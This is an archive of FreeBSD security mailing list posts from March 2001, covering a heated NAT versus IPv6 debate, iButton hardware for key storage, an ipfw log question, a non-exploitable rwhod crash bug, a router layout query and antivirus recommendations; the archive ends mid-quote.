To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 5:47:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113]) by hub.freebsd.org (Postfix) with ESMTP id E8C3237B72D; Tue, 13 Mar 2001 05:47:35 -0800 (PST) (envelope-from Bob@Talarian.Com) Received: from Talarian.Com (Relent.Bob.whitebarn.com [216.0.13.50]) by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id HAA38781; Tue, 13 Mar 2001 07:47:19 -0600 (CST) (envelope-from Bob@Talarian.Com) Message-ID: <3AAE24E6.9080802@Talarian.Com> Date: Tue, 13 Mar 2001 07:47:18 -0600 From: Bob Van Valzah User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215 X-Accept-Language: en MIME-Version: 1.0 To: Ted Mittelstaedt Cc: pW , FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG Subject: Re: Racoon Problem & Cisco Tunnel References: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> Content-Type: multipart/alternative; boundary="------------080107090808010207030409" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------080107090808010207030409 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Ted, Loved the book--can't wait for the movie! This is a religious war that's been fought many times before. Since my last answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are all just tools that I have to apply with "business sense." NAT's not inherently evil, nor is IPv6. Their sensibility will change over time and depend upon the application. If I were shopping for DSL for "my mom," I wouldn't care if she got a public address or not. Reliability and good support (as a "little guy" can more often provide) would be more important. But when I'm shopping for DSL for a work-from-home, multicast protocol stack developer, a public address is a requirement. 
In fact, it's something I'll pay extra to get. For my business, IPSec is important and hence having at least one public address is important.

My protocol developers have a few LANs at home and we happily use NAT there. I wouldn't pay extra to get enough address space to put public addresses on all their home lab machines.

An ISP who won't give me at least one public address is just limiting where I can apply their service. An ISP who gives me one or more public addresses lets me pick the point at which I want to apply NAT.

So in spite of my flip remarks, I hope you can see that I do use NAT--I just put it off to the last minute where it doesn't make business sense to avoid it.

Bob

Ted Mittelstaedt wrote:

>> -----Original Message-----
>> From: owner-freebsd-questions@FreeBSD.ORG
>> [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
>> Sent: Monday, March 12, 2001 8:07 AM
>> To: pW
>> Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
>> Subject: Re: Racoon Problem & Cisco Tunnel
>>
>>
>> Yes. The five DSL setups with which I'm familiar all grant at least one
>> public address per house. I believe all are static, but one might be
>> dynamic. Interference with protocols like IPSec is one of the reasons
>> why I'd make a public address a requirement when choosing a DSL
>> provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
>> possible. Let's hasten the deployment of IPv6.
>>
>
> I'd agree with you if everyone that would have to do a renumber of a
> large network from IPv4 to IPv6 had Vint Cerf's money. When you're retired
> like him with money coming out your arse-hole you can afford to make
> irresponsible statements like that.
> > Unfortunately, what people like him don't understand is that the burden of > renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely > on people like me - who have thousands of customers and tens of thousands of > public IP numbers spread out among all of them - and who don't have the > money to support something this audacious. I can almost guarentee that > whatever ISP that I am working for when this finally happens is going to go > out of business, all it's going to do is put thousands of smaller to > medium-sized ISP's into bankruptcy and let people like AOL who have money > coming out their arse-holes virtually monopolize Internet access in the > world. > > Until I see the large organizations with Class A's tied up, give up those > numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6, > and most other ISP's that are out there are going to fight it as well. In > the meantime I'm pushing all my customers into using NAT. NAT is here to > stay and people that run around calling it an aberration are just proving to > the rest of us that they have absolutely no business sense. > > NAT has proven itself reliable and vital and idiot engineers that design TCP > protocols that assume everyone has a public IP number are just architecting > their own failures, and their protocol's subsequent minimizing by the > market. I have some sympathy for protocols like IPSec that came to be > during the same time - but organizational-to-organizational IPSec tunnels > don't have to pass through the NAT - they can terminate on it. But, anyone > doing a new protocol today is a fool if it can't work though a NAT. > > > > Ted Mittelstaedt tedm@toybox.placo.com > Author of: The FreeBSD Corporate Networker's Guide > Book website: http://www.freebsd-corp-net-guide.com > > > --------------080107090808010207030409 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Ted, Loved the book--can't wait for the movie!

This is a religious war that's been fought many times before. Since my last answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are all just tools that I have to apply with "business sense." NAT's not inherently evil, nor is IPv6. Their sensibility will change over time and depend upon the application.

If I were shopping for DSL for "my mom," I wouldn't care if she got a public address or not. Reliability and good support (as a "little guy" can more often provide) would be more important.

But when I'm shopping for DSL for a work-from-home, multicast protocol stack developer, a public address is a requirement. In fact, it's something I'll pay extra to get. For my business, IPSec is important and hence having at least one public address is important.

My protocol developers have a few LANs at home and we happily use NAT there. I wouldn't pay extra to get enough address space to put public addresses on all their home lab machines.

An ISP who won't give me at least one public address is just limiting where I can apply their service. An ISP who gives me one or more public addresses let's me pick the point at which I want to apply NAT.

So in spite of my flip remarks, I hope you can see that I do use NAT--I just put it off to the last minute where it doesn't make business sense to avoid it.

   Bob

Ted Mittelstaedt wrote:
-----Original Message-----
From: owner-freebsd-questions@FreeBSD.ORG
[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
Sent: Monday, March 12, 2001 8:07 AM
To: pW
Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel


Yes. The five DSL setups with which I'm familiar all grant at least one
public address per house. I believe all are static, but one might be
dynamic. Interference with protocols like IPSec is one of the reasons
why I'd make a public address a requirement when choising a DSL!
provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
possible. Let's hasten the deployment of IPv6.


I'd agree with you if everyone that would have to do a renumber of a
large network from IPv4 to IPv6 had Vint Cerf's money. When you're retired
like him with money coming out your arse-hole you can afford to make
irresponsible statements like that.

Unfortunately, what people like him don't understand is that the burden of
renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely
on people like me - who have thousands of customers and tens of thousands of
public IP numbers spread out among all of them - and who don't have the
money to support something this audacious. I can almost guarantee that
whatever ISP that I am working for when this finally happens is going to go
out of business, all it's going to do is put thousands of smaller to
medium-sized ISP's into bankruptcy and let people like AOL who have money
coming out their arse-holes virtually monopolize Internet access in the
world.

Until I see the large organizations with Class A's tied up, give up those
numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
and most other ISP's that are out there are going to fight it as well. In
the meantime I'm pushing all my customers into using NAT. NAT is here to
stay and people that run around calling it an aberration are just proving to
the rest of us that they have absolutely no business sense.

NAT has proven itself reliable and vital and idiot engineers that design TCP
protocols that assume everyone has a public IP number are just architecting
their own failures, and their protocol's subsequent minimizing by the
market. I have some sympathy for protocols like IPSec that came to be
during the same time - but organizational-to-organizational IPSec tunnels
don't have to pass through the NAT - they can terminate on it. But, anyone
doing a new protocol today is a fool if it can't work through a NAT.



Ted Mittelstaedt tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com




From owner-freebsd-security Tue Mar 13 06:51:04 2001
Date: Tue, 13 Mar 2001 15:50:46 +0100
From: Terje Elde
To: Daniel Hagan
Cc: freebsd-security@freebsd.org
Subject: Re: iButton Development
Message-ID: <20010313155046.E9762@thinksec.com>
In-Reply-To: <3AADB1D3.C70E00C@colltech.com>; from dhagan@colltech.com on Tue, Mar 13, 2001 at 12:36:19AM -0500

On Tue, Mar 13, 2001 at 12:36:19AM -0500, Daniel Hagan wrote:
> There was some discussion regarding iButtons in mid-Jan on this list.
> I'm interested in getting one or more of these things to play with, with
> the goal of:

For reasons I don't quite know I missed that thread... However I'm the coordinator of the iButton project, which aims to define a set of API's to communicate with iButtons, or the 1-wire bus in general, as well as making a daemon to handle the actual communication with the 1-wire bus, as well as multiplexing between users and applications where desired.

I must admit the project has been idle for a little while now, though I'm sure a cooperation could be mutually beneficial.

> o Authenticating myself to my home workstations (pam module?).

Our plans include making a pam module which uses the API's(/sdk) for either simple authentication using the serial number on the iButtons (yuck) or my favorite, full public key authentication using the java iButtons.

> o Storing PGP & ssh keys.

Also an obvious extension. One idea we've been playing with is to not only keep the keys on the button, but never to let them be anywhere else. The java iButton for example, could handle the cryptographic functions for you.
It features cool things like rapid destroying of the content should you try to tamper with it.

> Since I assume these are tasks of interest to more people than just
> myself, I was wondering:
>
> o Does anyone have existing code bases to support these tasks?

We've done very basic coding and design of the API's, though we don't have any of the code working with the actual buttons up and running yet.

> o Is there any support (in the political sense) for getting the pam
> module and/or other code incorporated into the base system or as a port?

Strong cryptographic authentication system and secure storage with possible extension of cheap industrial chips with everything from temp sensors to AD/DA converters and whatnot. Who wouldn't want it?

> o Does anyone have any recommendations on what hardware to procure for
> these tasks? I was looking at getting a serial port BlueDot (possibly
> two or three, I have some laptops I may want to use this with too) and a
> DS1996L-F5 64-kbit Memory iButton. I would also think about getting a
> Java-powered iButton, Model 96, Release 1.1 (or 2.2) if I understood
> exactly what I'd be getting for the money. Does anyone have any
> information/examples on how these Java iButtons are used?

You probably want the following (in the order they're listed in the dalsemi shop online):

* DS1921L-F52 - Thermochron (-20°C to +85°C)
  It'll allow you to play more with the bus, making sure the knowledge sticks. Not really required for these tasks, but it's so cute.

* DS19550-401 - Java-powered iButton, Model 96, Release 1.1
* DS1957B-406 - Java-powered iButton, Model 96, Release 1.1
  You want both, because if you're going to do development on these, you'll probably want to make sure your software will work properly on both.

  As for what you'll get...

  * JVM
    These babies actually run Java code, as long as they're docked and have power.
    As soon as you rip out the power, the applications are still in a running state, but their execution speed is frozen so to speak.

  * PRNG
    Perfect to both feed your Java code, and perhaps also relay to a FreeBSD box to help feed its PRNG.

  * Crypto
    * SHA-1
    * RSA
    * DES
    * 3DES
    The math accelerator for RSA operations handles them with a less than 1 sec worst-case.

  At least the 2.2 release has 134kbytes of RAM, which makes it the iButton with the biggest storage.

* DS1963S-F5 - SHA-1 iButton
  You'll want this so you can do keyed hashes for authentication. It's much better than the java iButtons for this task, due to its lower price.

In addition to those you'll want some of the other memory iButtons, a nice selection to fit your taste. I recommend you get at least two or so of the bigger ones, and as many as you feel like of the cheaper.

For connectivity I would like to suggest that you get one or several serial adaptors, with matching bluedots. Let me remind you that there are differences between them, but which you'd want is perhaps a matter of taste. Getting some of each might not be a bad idea. I would recommend you stick with serial, as they're supposedly easier to use, and have some software already available (hint: ports/comms/mlan, though it's not up to date (hint)).

You might also want to look at the TINI, as it's got a 1-wire device, and would be pretty nice to integrate with everything.
Terje "delta" Elde
ThinkSec AS

From owner-freebsd-security Tue Mar 13 06:59:17 2001
To: Terje Elde
Cc: Daniel Hagan, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
In-Reply-To: Your message of "Tue, 13 Mar 2001 15:50:46 +0100." <20010313155046.E9762@thinksec.com>
Date: Tue, 13 Mar 2001 15:59:29 +0100
Message-ID: <7857.984495569@critter>
From: Poul-Henning Kamp

My share in this is mostly the monitoring gadgets with the 1wire products, but given working software I would probably put my pgp key somewhere more safe as well.

-- 
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From owner-freebsd-security Tue Mar 13 07:05:47 2001
Date: Tue, 13 Mar 2001 16:05:40 +0100
From: Terje Elde
To: Poul-Henning Kamp
Cc: Daniel Hagan, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
Message-ID: <20010313160540.F9762@thinksec.com>
In-Reply-To: <7857.984495569@critter>; from phk@critter.freebsd.dk on Tue, Mar 13, 2001 at 03:59:29PM +0100

On Tue, Mar 13, 2001 at 03:59:29PM +0100, Poul-Henning Kamp wrote:
> My share in this is mostly the monitoring gadgets with the 1wire
> products, but given working software I would probably put my pgp
> key somewhere more safe as well.

I do see your concern, and I would not automatically trust the iButtons 100%, but it's a good hardware building block to base things on.

If you store an encrypted version of your pgp/ssh keys on it, then you would really need to break the algorithm to gain access to the keys, in which case you can attack pgp in itself anyways. (Simplified; if you break the symmetric cipher which has encrypted the keys stored on the iButton then you've got the keys, while if you had broken the same symmetric cipher in pgp itself, the keys would be safe as soon as you switch to another algorithm, and you would have to perform one such crack for each message.)

Or rather, in the end how things are set up and used is really up to the end user. My goal is to try to help provide the tools to make the technology available, and also the guidance to balance the risks. What makes a good choice is highly dependent on a lot of factors, and what's right for you isn't always right for everyone else.
If my access was limited to a single shared win95 box, then I'd feel much more comfortable with an iButton performing the crypto for me, and keeping the keys, than storing them on the windows box.

Terje "delta" Elde
ThinkSec AS

From owner-freebsd-security Tue Mar 13 07:18:58 2001
Date: Tue, 13 Mar 2001 16:18:52 +0100
From: Terje Elde
To: Borja Marcos
Cc: Poul-Henning Kamp, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
Message-ID: <20010313161852.G9762@thinksec.com>
In-Reply-To: <3AAE3809.F795A6A5@sarenet.es>; from borjamar@sarenet.es on Tue, Mar 13, 2001 at 04:08:57PM +0100

On Tue, Mar 13, 2001 at 04:08:57PM +0100, Borja Marcos wrote:
> > Also an obvious extension. One idea we've been playing with is to not only
> > keep the keys on the button, but never to let them be anywhere else. The java
> > iButton for example, could handle the cryptographic functions for you. It
> > features cool things like rapid destroying of the content should you try to
> > tamper with it.
>
> This would be the ideal system; when used for ssh, for example,
> the button stores the private part of the RSA key, and the challenge is
> sent by the ssh-agent to the button. It encrypts the challenge and
> returns the answer.
>
> If the key is kept inside the button, it can be useful even
> in hostile environments. I understand that now there are buttons
> capable of running small programs.

As Poul-Henning points out, doing this isn't for everyone. It pretty much boils down to what you trust the most. The security of your hardware/software and your ability to set it up, or the iButtons.

In the case of my private workstation, I'd normally prefer running the crypto on the workstation itself, not allowing the iButtons to be as much of a weak link.
Should I ever have the need for ssh'ing from public company terminals to not quite secure systems on the other hand, this would be a good idea. A toolkit to pick what one likes from, not enforcing the way I want it on everyone else.

Terje

From owner-freebsd-security Tue Mar 13 07:40:57 2001
Date: Tue, 13 Mar 2001 09:37:23 -0600 (CST)
From: James Wyatt
To: Ted Mittelstaedt
Cc: Bob Van Valzah, pW, FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: RE: Racoon Problem & Cisco Tunnel
In-Reply-To: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>

On Mon, 12 Mar 2001, Ted Mittelstaedt wrote:
> >-----Original Message-----
> >From: owner-freebsd-questions@FreeBSD.ORG
> >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> >Sent: Monday, March 12, 2001 8:07 AM
> >Subject: Re: Racoon Problem & Cisco Tunnel
> >
> >Yes. The five DSL setups with which I'm familiar all grant at least one
> >public address per house. I believe all are static, but one might be
> >dynamic. Interference with protocols like IPSec is one of the reasons
> >why I'd make a public address a requirement when choosing a DSL
> >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> >possible. Let's hasten the deployment of IPv6.
[ ... ]
> Until I see the large organizations with Class A's tied up, give up those
> numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
> and most other ISP's that are out there are going to fight it as well. In
> the meantime I'm pushing all my customers into using NAT. NAT is here to
> stay and people that run around calling it an aberration are just proving to
> the rest of us that they have absolutely no business sense.

NAT is a tool and you can hurt yourself with it or do useful things with it, not an aberration or silver-bullet. Folks with fast hosts or small amounts of traffic and simple needs love it - especially home broadband users. There is a trade-off for many router users though: a) just change the header when NAT-ting, or b) correct the packet checksums and lose your ASIC efficiency and kill your shared-CPU. NAT can also make peer-to-peer networking for groups of workstations across NAT barriers difficult if you have to chew-up static IPs from what I can tell.

Many large corporations like GE Corp have huge RFC networks internally. If you ever have to make an internal Frame Relay link between them behind their public firewalls, you will learn new words for describing RFC networking limitations. "Oh &$*^^%!
Our router thinks their Chicago server is on the same LAN segment as our Fort Worth server, but with a different netmask. Which of us should renumber our servers? Can IPSec help this?"

> NAT has proven itself reliable and vital and idiot engineers that design TCP
> protocols that assume everyone has a public IP number are just architecting
> their own failures, and their protocol's subsequent minimizing by the
> market. I have some sympathy for protocols like IPSec that came to be
> during the same time - but organizational-to-organizational IPSec tunnels
> don't have to pass through the NAT - they can terminate on it. But, anyone
> doing a new protocol today is a fool if it can't work through a NAT.

When IPv4 was designed, everyone could have had their own number. It was done a *long* time ago, and did not envision "The Internet Explosion". Everyone else has just followed the specs so things interoperated. If those "idiot engineers" hadn't done that, you wouldn't have equipment coming out your "*rse-h*le" today. (^_^)

btw: If you stopped saying everyone else (including Vint Cerf, however misguided or misquoted) is an idiot fewer folks might miss your otherwise valid points. If I get it: "NAT works and IPv6 is still a *long* way off for many very strong commercial realities." I gotta mostly agree with that, but NAT has a price as well.

I hate fudging checksums because, while they only cause a little more coding for script kiddies making fake- or poison-packet generators, they also help ENet reliability. There are more things hurting packets than just collisions.

If the world ever decides to jump to IPv6, all the server folks have to renumber as well. How is this all supposed to happen without massive outages and downtime?
- Jy@

From owner-freebsd-security Tue Mar 13 08:39:39 2001
Date: Tue, 13 Mar 2001 08:40:20 -0800
From: Alan Batie
To: security@freebsd.org
Subject: ipfw rule -1?
Message-ID: <20010313084020.A5859@agora.rdrop.com>

I'm seeing a few of these in my ipfw log and was wondering what rule -1 is? I couldn't find anything about it in the man page...

> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16

-- 
Alan Batie                      ______     www.rdrop.com/users/alan   Me
alan@batie.org                  \    /     www.qrd.org                The Triangle
PGPFP DE 3C 29 17 C0 49 7A       \  /      www.pgpi.com               The Weird Numbers
      27 40 A5 3C 37 4A DA 52 B9  \/       www.anti-spam.net          NO SPAM!

From owner-freebsd-security Tue Mar 13 08:44:31 2001
Date: Tue, 13 Mar 2001 11:44:24 -0500 (EST)
From: Garrett Wollman
Message-Id: <200103131644.LAA73764@khavrinen.lcs.mit.edu>
To: security@freebsd.org
Subject: rwhod
In-Reply-To: <200103122347.f2CNlxT28110@freefall.freebsd.org>

< said:
> Remote users can cause the rwhod daemon to crash, denying service to
> clients.

It's worth noting that most people who run `rwhod' use it only for ``tourist information'' anyway and do not actually depend on the information it provides. I run it on my servers so that the nightly reports will include the summary of uptimes and load averages, but if one daemon goes AWOL I'll not be particularly concerned.

If, on the other hand, this bug is actually exploitable, that would be much more serious (and would warrant a reissue of the advisory).

-GAWollman

From owner-freebsd-security Tue Mar 13 09:01:06 2001
From: "Ted Mittelstaedt"
To: "James Wyatt"
Cc: "Bob Van Valzah", "pW"
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Tue, 13 Mar 2001 08:58:14 -0800
Message-ID: <000801c0abde$cb31c5a0$1401a8c0@tedm.placo.com>

>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of James Wyatt
>
>NAT is a tool and you can hurt yourself with it or do useful things with
>it, not an aberration or silver-bullet. Folks with fast hosts or small
>amounts of traffic and simple needs love it - especially home broadband
>users. There is a trade-off for many router users though: a) just change
>the header when NAT-ting, or b) correct the packet checksums and lose your
>ASIC efficiency and kill your shared-CPU. NAT can also make peer-to-peer
>networking for groups of workstations across NAT barriers difficult if you
>have to chew-up static IPs from what I can tell.
>
>Many large corporations like GE Corp have huge RFC networks internally. If
>you ever have to make an internal Frame Relay link between them behind
>their public firewalls, you will learn new words for describing RFC
>networking limitations. "Oh &$*^^%! Our router thinks their Chicago server
>is on the same LAN segment as our Fort Worth server, but with a different
>netmask.

So what? Different netmasks create different subnets. It's perfectly fine to have 2 different subnets on the same segment. Now, if you're using the word "segment" to mean something other than a physical segment, but rather to mean "subnet" then your statement is impossible. If both systems have different netmasks (and not the same IP addresses, of course) then it's impossible for them to be on the same subnet. Same physical segment, yes, but not the same subnet.

> Which of us should renumber our servers?

Neither. Sites that are geographically distant should be on separate subnets.

>
>When IPv4 was designed, everyone could have had their own number. It was
>done a *long* time ago, and did not envision "The Internet Explosion".
>Everyone else has just followed the specs so things interoperated. If
>those "idiot engineers" hadn't done that, you wouldn't have equipment
>coming out your "*rse-h*le" today.
>(^_^)
>

The engineers that designed all that weren't idiots - as they emphasized interoperability. If someone had come along back then and said "Let's throw away the IPv4 scheme and replace it with IPv6 because we might run out of numbers in the future" those engineers would have squashed that on the interoperability altar.

>btw: If you stopped saying everyone else (including Vint Cerf, however
>misguided or misquoted) is an idiot fewer folks might miss your otherwise
>valid points.

I'm not. I'm saying that people that insist the problem is we haven't all switched over to IPv6 are idiots. I'm also saying that engineers that sit down TODAY at a blank drawing board, AFTER NAT IS A REALITY, and design TCP/IP protocols that are incompatible with it are idiots. The majority of Internet engineers are NOT in this group. There's a vocal minority that is and are currently engaged in running around and telling the majority that we are doing it wrong by using NAT.

>If I get it: "NAT works and IPv6 is still a *long* way off
>for many very strong commercial realities." I gotta mostly agree with
>that, but NAT has a price as well.
>

Any connectivity solution has a price. NAT's price is cheaper than the price of renumbering the entire Internet to IPv6 and it will remain so until we truly are out of numbers, not just dealing with an artificial shortage. Sorry, but engineers that ignore this fiscal reality are idiot dreamers in my opinion.

>I hate fudging checksums because, while they only cause a little more
>coding for script kiddies making fake- or poison-packet generators, they
>also help ENet reliability. There are more things hurting packets than
>just collisions.
>
>If the world ever decides to jump to IPv6, all the server folks have to
>renumber as well. How is this all supposed to happen without massive
>outages and downtime?
>- Jy@
>

The IPv6 crowd is trying to frame the question as "It's not whether or not we are going to switch, it's when" I'm interested to see your framing the question as "It's not when we are going to switch to IPv6, it's IF"

I'm not even saying that. All I'm saying is that there is a tremendous amount that can be done to extend the lifetime of the current infrastructure, that includes NAT, extracting large public blocks from corporations that don't use them publicly, and many other things. I'm saying that it's likely that in our lifetimes that the Internet will NOT be switched over to IPv6. But, I'm not saying that it will NEVER be.

Ted Mittelstaedt tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com

From owner-freebsd-security Tue Mar 13 09:15:20 2001
To: Garrett Wollman
Cc: security@freebsd.org, iedowse@maths.tcd.ie
Subject: Re: rwhod
In-Reply-To: Your message of "Tue, 13 Mar 2001 11:44:24 EST." <200103131644.LAA73764@khavrinen.lcs.mit.edu>
Date: Tue, 13 Mar 2001 17:15:16 +0000
From: Ian Dowse
Message-ID: <200103131715.aa18169@salmon.maths.tcd.ie>

In message <200103131644.LAA73764@khavrinen.lcs.mit.edu>, Garrett Wollman writes:
>
>If, on the other hand, this bug is actually exploitable, that would be
>much more serious (and would warrant a reissue of the advisory).

I am pretty certain that there is nothing exploitable about this bug. The code ends up doing something like:

	int *p = &local_variable;

	/* no terminating condition: keeps walking up the stack */
	for (;;) {
		p[4] = ntohl(p[4]);
		p[5] = ntohl(p[5]);
		p += 6;
	}

The variable `p' is a register variable in the disassembly I looked at. So this simply scans forward through the stack byte-swapping ints, until it reaches inaccessible memory and dies.

Ian

From owner-freebsd-security Tue Mar 13 09:31:17 2001
Message-Id: <200103131841.SAA10089@mailgate.kechara.net>
Date: Tue, 13 Mar 2001 17:35:00 -0000
To: security@freebsd.org
From: Lee Smallbone
Subject: [OT?] - Central point router
Reply-To: lee@kechara.net
Organization: Kechara Internet

Hi,

I'm trying to set up a router (running FreeBSD) that will allow me to have
all network traffic on one network segment run through this router. This
is for purposes of applying global firewall rules, and also for traffic
monitoring. My setup looks a little something like this:

                    62.xx.139.1
    (internet) --- [telco supplied router]
                           |
                           |
                           |
                    [10/100 Switch] ----------- [firewall]-------(privately addressed LAN)
                    /      |      \
             [server 3]    |       \
            62.xx.139.6    |        \
                           |         \
                           |      [server 1]
                      [server 2]  62.xx.139.4
                     62.xx.139.5

What I'd like to be able to do is have a similar setup, but for it to look
like this:

                    62.xx.139.1
    (internet) --- [telco supplied router]
                           |
                           |
                           |                     62.xx.139.3
                    [10/100 Switch] ----------- [firewall]-------(privately addressed LAN)
                           |
                           |
                      62.xx.139.7
              ========[router/firewall]==========
                    /      |      \
             [server 3]    |       \
            62.xx.139.6    |        \
                           |         \
                           |      [server 1]
                      [server 2]  62.xx.139.4
                     62.xx.139.5

How can I achieve this? Any traffic destined for say, 62.xx.139.5 would
have to pass via 62.xx.139.7 first.

Any help appreciated.
--
Lee Smallbone
Kechara Internet

lee@kechara.net
www.kechara.net

Tel: (01243) 869 969
Fax: (01243) 866 685

From owner-freebsd-security Tue Mar 13 09:33:40 2001
Message-Id: <200103131843.SAA10102@mailgate.kechara.net>
Date: Tue, 13 Mar 2001 17:37:22 -0000
To: security@freebsd.org
From: Lee Smallbone
Subject: Re: [OT?] - Central point router
Reply-To: lee@kechara.net
Organization: Kechara Internet

That didn't come out too well... If anyone can help, please let me know
(from the text description) and I'll mail you a txt attachment with a
proper 'map'.

Thanks.

13/03/2001 17:35:00, Lee Smallbone wrote:
> Hi,
>
> I'm trying to set up a router (running FreeBSD) that will allow me to have
> all network traffic on one network segment run through this router. This
> is for purposes of applying global firewall rules, and also for traffic
> monitoring. My setup looks a little something like this:
>
> [network diagram as in the original message]
>
> What I'd like to be able to do is have a similar setup, but for it to
> look like this:
>
> [second network diagram as in the original message]
>
> How can I achieve this? Any traffic destined for say, 62.xx.139.5 would
> have to pass via 62.xx.139.7 first.
>
> Any help appreciated.
>
> --
>
> Lee Smallbone
> Kechara Internet
>
> lee@kechara.net
> www.kechara.net
>
> Tel: (01243) 869 969
> Fax: (01243) 866 685

--
Lee Smallbone
Kechara Internet

lee@kechara.net
www.kechara.net

Tel: (01243) 869 969
Fax: (01243) 866 685

From owner-freebsd-security Tue Mar 13 09:49:39 2001
Date: Tue, 13 Mar 2001 09:48:33 -0800 (PST)
From: Scott Campbell
To: James Wyatt
Cc: Will Mitayai Keeso Rowe,
Subject: Re: Virus Scanning Software for FreeBSD

On Mon, 12 Mar 2001, James Wyatt wrote:

> I have an eval copy of a product that looks promising: Sophos antivirus.
>
> http://www.sophos.com/products/antivirus/savunix.html
>
> You can use the SAVI (API for virus checking) to scan email according to
> the description at:
>
> http://www.sophos.com/products/antivirus/savi/
>
> Their licensing looks fair and the sales person assigned to me has been
> politely helpful and not overly insistent. Everything I've looked at so
> far looks great, but the customer that wanted it has had delays and now
> wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
>
> Updates are monthly CDs and urgent updates are available as downloads.
>
> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.
>
> Best of all, they support FreeBSD so we should support them, right? - Jy@

I can't say enough good things about the Sophos product. We originally
got it in April '99 and have been successfully stopping viruses ever
since. It is running on our mail server (currently FreeBSD v4.2R, was
3.0Snap until March 1) and is still available in aout and elf versions.
They have also added archive scanning inside numerous archive types. At
the time it was the only major company to have a FreeBSD version (NAI was
reported to have one but I couldn't track it down). I wrote my own
script, instead of using Amavis, to work with Sendmail to virus scan.
Another thing that I've set up is an automatic ide (virus identity)
download from Sophos.
You can ask for automatic email notification when they have written a new
ide for a new virus (or variant). When that email arrives the new ide file
is fetched and put into the sweep (their virus checking program) directory
and used next time it is run (I batch my email scanning). Service and
support questions have always been answered quickly and professionally.

We also use it on all our Win95/98/Me/NT machines - they update themselves
from a central server that is upgraded manually each month when the CD
arrives.

Scott E. Campbell
_______________________________
Computer Operations
Greater Victoria Public Library
Victoria BC CANADA
(250)382-7241 x230
scampbel@gvpl.ca

> On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> > Is anyone aware of any virus scanning solutions for freebsd, particularly
> > solutions for email? I don't trust my users not to follow proper email
> > guidelines, and thus would like to stop email at the server before they
> > get delivered the message.
> >
> > Regards,
> > Mit
> >
> > --
> > Will Mitayai Keeso Rowe
> >
> > For full contact information, please visit:
> > http://my.infotriever.com/mitayai

From owner-freebsd-security Tue Mar 13 10:01:08 2001
From: "Vladimir B. Grebenschikov"
Message-ID: <15022.24659.260945.39477@vbook.express.ru>
Date: Tue, 13 Mar 2001 21:00:51 +0300 (MSK)
To: Scott Campbell
Cc: James Wyatt, Will Mitayai Keeso Rowe,
Subject: Re: Virus Scanning Software for FreeBSD

Scott Campbell writes:

> On Mon, 12 Mar 2001, James Wyatt wrote:
>
> > I have an eval copy of a product that looks promising: Sophos antivirus.
> >
> > http://www.sophos.com/products/antivirus/savunix.html
> >
> > You can use the SAVI (API for virus checking) to scan email according to
> > the description at:
> >
> > http://www.sophos.com/products/antivirus/savi/
> >
> > Their licensing looks fair and the sales person assigned to me has been
> > politely helpful and not overly insistent. Everything I've looked at so
> > far looks great, but the customer that wanted it has had delays and now
> > wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
> >
> > Updates are monthly CDs and urgent updates are available as downloads.
> >
> > Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> > scan the Samba partitions for file infections. It handles uSoft Office
> > products like Word(tm) docs and such.
> >
> > Best of all, they support FreeBSD so we should support them, right? - Jy@
>
> I can't say enough good things about the Sophos product. We originally
> got it in April '99 and have been successfully stopping viruses ever
